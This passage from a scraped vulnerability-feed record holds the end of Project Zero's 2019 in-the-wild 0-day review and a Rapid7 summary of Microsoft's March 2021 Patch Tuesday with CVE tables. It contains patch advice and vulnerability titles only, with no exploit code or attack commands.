included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I\u2019d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, \u201ctips\u201d about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? 
Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome since it\u2019s so difficult for external researchers to get into those platforms and detect exploitation.\n\n## \u201cClandestine\u201d 0-day reporting\n\nAnecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.\n\n# 0-day Detection on Mobile Platforms\n\nAs mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to [Zerodium](<https://zerodium.com/program.html>). We know that these exploits are being developed and used, we\u2019re just not finding them. 
The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the \u201cwalled garden\u201d of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it\u2019s so difficult for non-vendors to deploy solutions, we as users and the security community, rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes, how do we as fellow security professionals incentivize the vendors to prioritize this?\n\nAnother interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day since we started tracking 0-days targeting Android. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet, the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn\u2019t mean none were used. Instead it means we aren\u2019t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020.\n\n# Detection on Other Platforms\n\nIt\u2019s interesting to note that other popular platforms had no 0-days detected over the same period: like Linux, Safari, or macOS. 
While no 0-days have been publicly detected in these operating systems, we can have confidence that they are still targets of interest, based on the amount of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro\u2019s OfficeScan is worth targeting, then so are the other much more prevalent products. If that\u2019s the case, then again it leads us back to detection. We should also keep in mind though that some platforms may not need 0-days for successful exploitation. For example, this [blogpost](<https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html>) details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can\u2019t make confident determinations of how much 0-day exploitation is occurring per platform.\n\n# Conclusion\n\nHere\u2019s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish based on feedback from you and as our own knowledge and experience continues to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily \u201ctechnical\u201d, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world. \n\nAlong with publishing this Year in Review today, we\u2019re also publishing the [root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we completed, which were used to draw our conclusions. Please check out the [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) if you\u2019re interested in more details about the different 0-days exploited in the wild in 2019. 
\n\n \n\n", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "href": "https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html", "type": "googleprojectzero", "title": "\nDetection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-13T12:49:58", "bulletinFamily": "info", "cvelist": ["CVE-2020-27844", "CVE-2021-1640", "CVE-2021-1729", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21300", "CVE-2021-24089", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24104", "CVE-2021-24107", "CVE-2021-24108", "CVE-2021-24110", "CVE-2021-26411", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26859", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26887", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", 
"CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-26902", "CVE-2021-27047", "CVE-2021-27048", "CVE-2021-27049", "CVE-2021-27050", "CVE-2021-27051", "CVE-2021-27052", "CVE-2021-27053", "CVE-2021-27054", "CVE-2021-27055", "CVE-2021-27056", "CVE-2021-27057", "CVE-2021-27058", "CVE-2021-27059", "CVE-2021-27060", "CVE-2021-27061", "CVE-2021-27062", "CVE-2021-27063", "CVE-2021-27065", "CVE-2021-27066", "CVE-2021-27070", "CVE-2021-27074", "CVE-2021-27075", "CVE-2021-27076", "CVE-2021-27077", "CVE-2021-27078", "CVE-2021-27080", "CVE-2021-27081", "CVE-2021-27082", "CVE-2021-27083", "CVE-2021-27084", "CVE-2021-27085"], "description": "\n\nAnother Patch Tuesday ([2021-Mar](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>)) is upon us and with this month comes a whopping 122 CVEs. As usual Windows tops the list of the most patched product. However, this month it\u2019s browser vulnerabilities taking the second place, outnumbering Office vulnerabilities 3:1! Lastly, the Exchange Server vulnerabilities this month are not to be ignored as more than half of them have been seen exploited in the wild.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 59 \nBrowser | 35 \nESU | 24 \nMicrosoft Office | 11 \nExchange Server | 7 \nDeveloper Tools | 6 \nAzure | 3 \nSQL Server | 1 \n \n## [Exchange Server Vulnerabilities](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>)\n\nEarlier this month Microsoft [released out of band updates for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). 
These critical updates fixed a number of publicly exploited vulnerabilities, but not before attackers were able to compromise over 30,000 internet facing instances. \n\nYesterday, Microsoft issued an [additional set of patches](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) for older, unsupported versions of Exchange Server. This allows customers who have not been able to update to the most recent version of Exchange the ability to defend against these widespread exploit attempts.\n\nIf you administer an Exchange Server,** stop reading this blog and go patch these systems!** For more information [please see our blog post on the topic](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>).\n\n## Patch those Windows systems!\n\nAlmost half of the newly announced vulnerabilities this month affect components of Windows itself. Some major highlights include:\n\n * Multiple high severity RCE vulnerabilities in Windows DNS Server \n([CVE-2021-26877](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26877>), [CVE-2021-26893](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26893>), [CVE-2021-26894](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26894>), [CVE-2021-26895](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26895>), and [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>))\n * Remote Code Execution in Hyper-V ([CVE-2021-26867](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26867>)) enabling virtual machine escape (CVSSv3 9.9)\n\n## Browser Vulnerabilities\n\nSince going end-of-life in November 2020, we haven't seen any Internet Explorer patches from Microsoft. 
However, this month Microsoft has made two new updates available: [CVE-2021-27085](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27085>) and [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>). CVE-2021-26411 has been exploited in the wild, so don't delay applying patches if IE is still in your environment.\n\nThe majority of the browser vulnerabilities announced this month affect Microsoft Edge on Chromium. These patches are courtesy of vulnerabilities being fixed upstream in the Chromium project.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27075>) | Azure Virtual Machine Information Disclosure Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-27080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27080>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 9.3 | Yes \n[CVE-2021-27074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27074>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 6.2 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27085>) | Internet Explorer Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-21190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21190>) | Chromium CVE-2021-21190 : Uninitialized Use in PDFium | No | No | N/A | Yes \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21189>) | Chromium CVE-2021-21189: Insufficient policy enforcement in payments | No | 
No | N/A | Yes \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21188>) | Chromium CVE-2021-21188: Use after free in Blink | No | No | N/A | Yes \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21187>) | Chromium CVE-2021-21187: Insufficient data validation in URL formatting | No | No | N/A | Yes \n[CVE-2021-21186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21186>) | Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning | No | No | N/A | Yes \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21185>) | Chromium CVE-2021-21185: Insufficient policy enforcement in extensions | No | No | N/A | Yes \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21184>) | Chromium CVE-2021-21184: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21183>) | Chromium CVE-2021-21183: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21182>) | Chromium CVE-2021-21182: Insufficient policy enforcement in navigations | No | No | N/A | Yes \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21181>) | Chromium CVE-2021-21181: Side-channel information leakage in autofill | No | No | N/A | Yes \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21180>) | Chromium CVE-2021-21180: Use after free in tab search | No | No | N/A | Yes \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21179>) | Chromium CVE-2021-21179: Use after free in Network Internals | No | No | N/A | Yes 
[CVE-2021-21178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21178>) | Chromium CVE-2021-21178: Inappropriate implementation in Compositing | No | No | N/A | Yes
[CVE-2021-21177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21177>) | Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill | No | No | N/A | Yes
[CVE-2021-21176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21176>) | Chromium CVE-2021-21176: Inappropriate implementation in full screen mode | No | No | N/A | Yes
[CVE-2021-21175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21175>) | Chromium CVE-2021-21175: Inappropriate implementation in Site isolation | No | No | N/A | Yes
[CVE-2021-21174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21174>) | Chromium CVE-2021-21174: Inappropriate implementation in Referrer | No | No | N/A | Yes
[CVE-2021-21173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21173>) | Chromium CVE-2021-21173: Side-channel information leakage in Network Internals | No | No | N/A | Yes
[CVE-2021-21172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21172>) | Chromium CVE-2021-21172: Insufficient policy enforcement in File System API | No | No | N/A | Yes
[CVE-2021-21171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21171>) | Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation | No | No | N/A | Yes
[CVE-2021-21170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21170>) | Chromium CVE-2021-21170: Incorrect security UI in Loader | No | No | N/A | Yes
[CVE-2021-21169](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21169>) | Chromium CVE-2021-21169: Out of bounds memory access in V8 | No | No | N/A | Yes
[CVE-2021-21168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21168>) | Chromium CVE-2021-21168: Insufficient policy enforcement in appcache | No | No | N/A | Yes
[CVE-2021-21167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21167>) | Chromium CVE-2021-21167: Use after free in bookmarks | No | No | N/A | Yes
[CVE-2021-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21166>) | Chromium CVE-2021-21166: Object lifecycle issue in audio | No | No | N/A | Yes
[CVE-2021-21165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21165>) | Chromium CVE-2021-21165: Object lifecycle issue in audio | No | No | N/A | Yes
[CVE-2021-21164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21164>) | Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS | No | No | N/A | Yes
[CVE-2021-21163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21163>) | Chromium CVE-2021-21163: Insufficient data validation in Reader Mode | No | No | N/A | Yes
[CVE-2021-21162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21162>) | Chromium CVE-2021-21162: Use after free in WebRTC | No | No | N/A | Yes
[CVE-2021-21161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21161>) | Chromium CVE-2021-21161: Heap buffer overflow in TabStrip | No | No | N/A | Yes
[CVE-2021-21160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21160>) | Chromium CVE-2021-21160: Heap buffer overflow in WebAudio | No | No | N/A | Yes
[CVE-2021-21159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21159>) | Chromium CVE-2021-21159: Heap buffer overflow in TabStrip | No | No | N/A | Yes
[CVE-2020-27844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-27844>) | Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG | No | No | N/A | Yes

## Browser ESU Vulnerabilities

CVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ
---|---|---|---|---|---
[CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>) | Internet Explorer Memory Corruption Vulnerability | Yes | Yes | 8.8 | Yes

## Developer Tools Vulnerabilities

CVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ
---|---|---|---|---|---
[CVE-2021-27060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27060>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No
[CVE-2021-27084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27084>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | No | No | N/A | No
[CVE-2021-27081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27081>) | Visual Studio Code ESLint Extension Remote Code Execution Vulnerability | No | No | 7.8 | No
[CVE-2021-27083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27083>) | Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No
[CVE-2021-27082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27082>) | Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No
[CVE-2021-21300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21300>) | Git for Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | No

## Exchange Server Vulnerabilities

CVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ
---|---|---|---|---|---
[CVE-2021-26412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26412>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No
[CVE-2021-26855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 9.1 | Yes
[CVE-2021-27078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27078>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No
[CVE-2021-26857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes
[CVE-2021-27065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes
[CVE-2021-26858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes
[CVE-2021-26854](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26854>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 6.6 | No

## Microsoft Office Vulnerabilities

CVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ
---|---|---|---|---|---
[CVE-2021-27055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27055>) | Microsoft Visio Security Feature Bypass Vulnerability | No | No | 7 | Yes
[CVE-2021-24104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24104>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | Yes
[CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2021-27052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27052>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes
[CVE-2021-27056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27056>) | Microsoft PowerPoint Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-24108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24108>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-27057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27057>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-27059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27059>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.6 | Yes
[CVE-2021-27058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27058>) | Microsoft Office ClickToRun Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-27053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27053>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-27054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27054>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes

## SQL Server Vulnerabilities

CVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ
---|---|---|---|---|---
[CVE-2021-26859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26859>) | Microsoft Power BI Information Disclosure Vulnerability | No | No | 7.7 | Yes

## Windows Vulnerabilities

CVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ
---|---|---|---|---|---
[CVE-2021-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26900>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26863>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No
[CVE-2021-26871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26871>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26885>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26864>) | Windows Virtual Registry Provider Elevation of Privilege Vulnerability | No | No | 8.4 | No
[CVE-2021-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1729>) | Windows Update Stack Setup Elevation of Privilege Vulnerability | No | No | 7.1 | No
[CVE-2021-26889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26889>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.1 | No
[CVE-2021-26866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26866>) | Windows Update Service Elevation of Privilege Vulnerability | No | No | 7.1 | No
[CVE-2021-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26870>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26874>) | Windows Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26879>) | Windows NAT Denial of Service Vulnerability | No | No | 7.5 | No
[CVE-2021-26884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26884>) | Windows Media Photo Codec Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 9.9 | Yes
[CVE-2021-26868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26868>) | Windows Graphics Component Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26892>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 6.2 | No
[CVE-2021-24090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24090>) | Windows Error Reporting Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26865>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 8.8 | No
[CVE-2021-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26891>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26860>) | Windows App-V Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-27066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066>) | Windows Admin Center Security Feature Bypass Vulnerability | No | No | 4.3 | No
[CVE-2021-27070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27070>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No
[CVE-2021-26886](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26886>) | User Profile Service Denial of Service Vulnerability | No | No | 5.5 | No
[CVE-2021-26880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26880>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26876>) | OpenType Font Parsing Remote Code Execution Vulnerability | No | No | 8.8 | No
[CVE-2021-24089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24089>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-26902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26902>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-27061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27061>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-24110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24110>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-27047](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27047>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-27048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27048>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-27049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27049>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-27050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27050>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-27051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27051>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-27062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27062>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-24095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24095>) | DirectX Elevation of Privilege Vulnerability | No | No | 7 | No
[CVE-2021-26890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26890>) | Application Virtualization Remote Code Execution Vulnerability | No | No | 7.8 | No

## Windows ESU Vulnerabilities

